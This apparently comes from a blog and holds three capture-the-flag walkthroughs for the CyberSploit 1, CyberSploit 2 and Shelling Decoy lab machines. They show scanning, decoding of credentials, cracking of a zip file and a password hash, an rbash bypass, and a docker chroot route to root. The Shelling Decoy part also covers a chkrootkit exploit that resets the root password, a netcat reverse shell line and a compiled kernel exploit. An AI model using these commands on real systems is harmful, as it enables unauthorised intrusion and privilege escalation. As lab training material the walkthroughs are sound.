rooting cybersploit 2 machine ?


Overview:

Target Machine IP Address: 192.168.56.41
My Machine IP Address: 192.168.56.20

Mission:

Boot to Root

Your target is gain the Root access

There is no any flag in this VMs

Share root access with me twitter@cybersploit1

This works better with VirtualBox rather than VMware

Download:

You can download the machine from here.

************************************

Information Gathering & Scanning Process:

sudo arp-scan --interface=eth0 192.168.56.1/24

nmap -sC -sV -p- 192.168.56.41 -o nmap.log

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
80/tcp open http Apache httpd 2.4.37 ((centos))

Let’s browse 192.168.56.41

Some strings are encrypted. Let’s check out the source code. (ctrl+u shortcut key)

Yes, this is a ROT47 encrypted message, I thought to write a script to do this however, let’s not waste time. Better google an online tool for this task.  I used this one.

username: D92:=6?5C2 -> shailendra
password: 4J36CDA=@:E-> cybersploit1

Since the target machine is running SSH service, let’s try that.

ssh shailendra@192.168.56.41

ls -lah

We got a hint.txt

The system is running docker.

Remember always, this will be our black book of magic (gtfobins.github.io/)

 

docker run -v /:/mnt --rm -it alpine chroot /mnt sh 

However, in order to run this command, you need to provide the internet (at least in my case), else you might not able to download alpine/latest.

Finally, cybersploit2 is pwned!!

Shelling Decoy

Overview:

Target Machine IP Address: 192.168.56.42
My Machine IP Address: 192.168.56.20

Mission:

THIS IS A MACHINE FOR COMPLETE BEGINNER, THERE ARE THREE FALGS AVAILABLE IN THIS VM.

FROM THIS VMs YOU WILL LEARN ABOUT ENCODER-DECODER & EXPLOIT-DB.

Download:

You can download the machine from here.

************************************

Information Gathering & Scanning Process:

sudo arp-scan --interface=eth0 192.168.56.1/24

nmap -sC -sV -p- 192.168.56.42 -o nmap.log

https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)

80/tcp open http Apache httpd 2.4.38
| http-ls: Volume /
| SIZE TIME FILENAME
| 3.0K 2020-07-07 16:36 save.zip

https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdfThe zip file required a password to access it.  I am not able to find anything which could be leveraged to use as password. Let’s crack it through brute force using rockyou.txt with fcrackzip tool.

 fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt save.zip 

password: manuelhttps://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf

We were able to get some juicy information and I am not going to write here each file, however, I am sure you know well that shadow file is the hashed form of the password for the users.  I think this may be enough.

We need to break the hash, so let’s use john for the task and take necessary hashes and make it in one form.

username: 296640a3b825115a47b68fc44501c828

echo "$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us." | > ../hash.txt

ssh 296640a3b825115a47b68fc44501c828@192.168.56.42

password: server

We need to bypass the rbash restriction. I have never used it however, I have seen this in blog and youtube vidoes by IPPSec.

If you want to know more about rbash bypass, you can read it from here.

From that pdf resources, I tried all the commands and it didn’t work. However, as I tried the following Advance Techniques part, it no longer gives me

ssh 296640a3b825115a47b68fc44501c828@192.168.56.42 -t "bash --noprofile"

Now we can see that it no longer showing us rbash restriction rather command not found which means, the binary or the command path needs to be fixed here.

What I tried was I echo the PATH of my Kali Machine and copied this path and set it to the target machine. Perhaps you might understand it better if you see this screenshot.

PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/go/bin/:/root/go-workspace/bin

Ok, let’s download pspy on Kali Machine and they transfer that to out targetted machine. I use SimpleHTTPServer to do the work, of course, you can have your own method 🙂

Let’s do a searchexploit chkrootkit or search chkrootkit on google (it will show exploit-db which is GUI of searchsploit).

When we read the exploit steps (like how to configure and how to use it), it tells us this..

The steps are quite self-explanatory, however, what I did here is, I checked the location of the NC program in the target box and then let it run /bin/sh with port 1234, to reverse a connection to IP address 192.168.56.33 (My Kali Machine). Of course, as per the instruction we need to give execution permission to out executable file

Note: I checked the cron entry and I was not able to find any relevant information that whether update (which we have created) is running nor I found chkrootkit related. Interestingly when I check the process through pspy64, periodically /tmp/update is running. Therefore, we can leverage that to our purpose. By the way, this might be because when we run this program honeypot.decoy, it triggers the chkrootkit.

Exploit 1:

#!/bin/bash
echo 'root:tcert.net' | sudo chpasswd

save it as update (by the way, you have to use nano editor this time because if I am not wrong vi editor is not available)

chmod +s update  (I sipped tea and look around) and then 

su - root 

password: tcert.net 

 

Exploit 2:  (It didn’t work for me. I need to dig little deeper)

echo "/usr/bin/nc -e /bin/sh 192.168.56.33:1234" > update
chmod +x update

That’s all guys 🙂

 

 

 

 

 

 

Let’s pwn cybersploit machine

Overview:

Target Machine IP Address: 192.168.56.40
My Machine IP Address: 192.168.56.20

Mission:

THIS IS A MACHINE FOR COMPLETE BEGINNER, THERE ARE THREE FALGS AVAILABLE IN THIS VM.

FROM THIS VMs YOU WILL LEARN ABOUT ENCODER-DECODER & EXPLOIT-DB.

Download:

You can download the machine from here.

************************************

Information Gathering & Scanning Process:

sudo arp-scan --interface=eth0 192.168.56.1/24

nmap -sC -sV -p- 192.168.56.40 -o nmap.log

 

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))

username:itsskv

cybersploit

CyBeRSplOiT

I ran nikto but didn’t get information but gobuster did give me something..

gobuster dir -u 192.168.56.40 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log

http://192.168.56.40/robots.txt

 

 

R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9

Let’s decrypt the string…

echo "R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9" | base64 -d

Flag1: cybersploit{youtube.com/c/cybersploit}

By the way,  you might be wondering what is at http://192.168.56.40/hacker  (it was just a gif).

Ok since, we got the username: itsskv

And password:  cybersploit{youtube.com/c/cybersploit}

And the box is running ssh, how about we try that first?

ssh itsskv@192.168.56.40

ls -lah

cat flag2.txt

I used this website to decrypt. https://cryptii.com/pipes/binary-to-english

good work !
flag2: cybersploit{https:t.me/cybersploit1}
uname -a

3.13.0-32-generic

Google  3.13.0-32-generic exploit   searchsploit didn’t work for me (I will figure this out later)

 

https://www.exploit-db.com/exploits/37292

 gcc 37292.c -o exploit

./exploit

flag3: cybersploit{Z3X21CW42C4 many many congratulations !}

That’s it guys! Going to have breakfast now … little hungry lol

Wish you a productive day!!